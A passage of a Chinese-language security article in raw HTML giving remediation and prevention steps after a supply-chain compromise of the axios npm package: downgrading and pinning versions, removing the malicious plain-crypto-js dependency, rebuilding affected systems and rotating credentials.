0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">降级到安全版本：</span></strong></p></li></ol><pre mp-original-font-size="12" mp-original-line-height="2" class="js_darkmode__24" style="margin: 1em 0.5em;padding: 0.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-radius: 5px;line-height: 2;box-shadow: rgba(0, 0, 0, 0.55) 0px 1px 5px;font-size: 12px;background: rgb(253, 246, 227);"><p mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;background-repeat: no-repeat;width: 653.029907px;height: 16px;font-size: 12px;line-height: 2;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="45" height="12" viewBox="0 0 450 130" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;" role="img" aria-label="插图"><ellipse cx="65" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="385" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse></svg></p><code class="js_darkmode__25" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0.5em;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;display: block;overflow-x: auto;color: rgb(88, 110, 117);background: rgb(253, 246, 227);font-size: 12px;line-height: 2;"><span leaf="">npm install axios@1.14.0  </span><span class="js_darkmode__26" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(131, 148, 150);font-size: 12px;line-height: 2;"><span leaf=""># 1.x 用户</span></span><span leaf=""><br/></span><span leaf="">npm install axios@0.30.3  </span><span class="js_darkmode__27" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(131, 148, 150);font-size: 12px;line-height: 2;"><span leaf=""># 0.x 用户</span></span></code></pre><ol style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: decimal;line-height: 1.75;" class="list-paddingleft-1" start="2"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">在 package.json 中添加版本锁定：</span></strong></p></li></ol><pre mp-original-font-size="12" mp-original-line-height="2" class="js_darkmode__28" style="margin: 1em 0.5em;padding: 0.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-radius: 5px;line-height: 2;box-shadow: rgba(0, 0, 0, 0.55) 0px 1px 5px;font-size: 12px;background: rgb(253, 246, 227);"><p mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;background-repeat: no-repeat;width: 653.029907px;height: 16px;font-size: 12px;line-height: 2;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="45" height="12" viewBox="0 0 450 130" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;" role="img" aria-label="插图"><ellipse cx="65" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="385" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse></svg></p><code class="js_darkmode__29" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0.5em;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;display: block;overflow-x: auto;color: rgb(88, 110, 117);background: rgb(253, 246, 227);font-size: 12px;line-height: 2;"><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">{</span></span><span leaf=""><br/></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(203, 75, 22);font-size: 12px;line-height: 2;"><span leaf="">&#34;dependencies&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">:</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">{</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(203, 75, 22);font-size: 12px;line-height: 2;"><span leaf="">&#34;axios&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">:</span></span><span class="js_darkmode__30" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(133, 153, 0);font-size: 12px;line-height: 2;"><span leaf="">&#34;1.14.0&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">}</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">,</span></span><span leaf=""><br/></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(203, 75, 22);font-size: 12px;line-height: 2;"><span leaf="">&#34;overrides&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">:</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">{</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(203, 75, 22);font-size: 12px;line-height: 2;"><span leaf="">&#34;axios&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">:</span></span><span class="js_darkmode__31" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(133, 153, 0);font-size: 12px;line-height: 2;"><span leaf="">&#34;1.14.0&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">}</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">,</span></span><span leaf=""><br/></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(203, 75, 22);font-size: 12px;line-height: 2;"><span leaf="">&#34;resolutions&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">:</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">{</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(203, 75, 22);font-size: 12px;line-height: 2;"><span leaf="">&#34;axios&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">:</span></span><span class="js_darkmode__32" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(133, 153, 0);font-size: 12px;line-height: 2;"><span leaf="">&#34;1.14.0&#34;</span></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">}</span></span><span leaf=""><br/></span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(88, 110, 117);font-size: 12px;line-height: 2;"><span leaf="">}</span></span></code></pre><ol style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: decimal;line-height: 1.75;" class="list-paddingleft-1" start="3"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">删除恶意依赖包：</span></strong></p></li></ol><pre mp-original-font-size="12" mp-original-line-height="2" class="js_darkmode__33" style="margin: 1em 0.5em;padding: 0.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-radius: 5px;line-height: 2;box-shadow: rgba(0, 0, 0, 0.55) 0px 1px 5px;font-size: 12px;background: rgb(253, 246, 227);"><p mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;background-repeat: no-repeat;width: 653.029907px;height: 16px;font-size: 12px;line-height: 2;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="45" height="12" viewBox="0 0 450 130" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;" role="img" aria-label="插图"><ellipse cx="65" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="385" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse></svg></p><code class="js_darkmode__34" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0.5em;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;display: block;overflow-x: auto;color: rgb(88, 110, 117);background: rgb(253, 246, 227);font-size: 12px;line-height: 2;"><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(42, 161, 152);font-size: 12px;line-height: 2;"><span leaf="">rm</span></span><span leaf=""> -rf node_modules/plain-crypto-js</span><span leaf=""><br/></span><span leaf="">npm install --ignore-scripts</span></code></pre><ol style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: decimal;line-height: 1.75;" class="list-paddingleft-1" start="4"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">如果已执行恶意脚本：</span></strong></p></li></ol><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">⚠️ 立即将系统视为完全沦陷！</span></strong><span leaf="">不要尝试原地清理，应从已知安全状态重建系统，并轮换所有凭证（SSH 密钥、API Token、云服务等）。</span></p><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">长期预防措施</span></span></h3><ul style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: disc;line-height: 1.75;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">始终锁定依赖版本，避免使用</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">latest</span></code><span leaf="">或未限定范围的版本</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">在 CI/CD 中启用依赖审计（如</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">npm audit</span></code><span leaf="">、Socket.dev 等）</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">设置</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">npm config set min-release-age 3</span></code><span leaf="">避免安装刚发布的新包</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">定期审查 lockfile 变更，警惕未经审查的依赖更新</span></p></li></ul><hr style="margin: 20px 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-width: 2px 0px 0px;border-style: solid none none;border-color: rgb(238, 242, 245) currentcolor currentcolor;border-image: none;border-radius: 2px;line-height: 1.75;"/><h2 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 1px 12.5px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(255, 255, 255);border-radius: 4px;display: inline-block;background-color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">参考来源</span></span></h2><div mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: flex;font-size: 14.4px;line-height: 1.75;"><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: inline;width: 67.690216px;font-size: 14.4px;line-height: 1.75;"><span leaf="">[1]</span></span><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;display: inline;width: 609.293518px;word-break: break-all;font-size: 14.4px;line-height: 1.75;"><span leaf="">axios@1.14.1:</span><i mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;line-height: 1.75;"><span leaf="">mailto:axios@1.14.1</span></i></span></p><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: flex;font-size: 14.4px;line-height: 1.75;"><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: inline;width: 67.690216px;font-size: 14.4px;line-height: 1.75;"><span leaf="">[2]</span></span><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;display: inline;width: 609.293518px;word-break: break-all;font-size: 14.4px;line-height: 1.75;"><span leaf="">axios@0.30.4:</span><i mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;line-height: 1.75;"><span leaf="">mailto:axios@0.30.4</span></i></span></p><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: flex;font-size: 14.4px;line-height: 1.75;"><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: inline;width: 67.690216px;font-size: 14.4px;line-height: 1.75;"><span leaf="">[3]</span></span><span mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;display: inline;width: 609.293518px;word-break: break-all;font-size: 14.4px;line-height: 1.75;"><span leaf="">StepSecurity - axios Compromised on npm:</span><i mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box 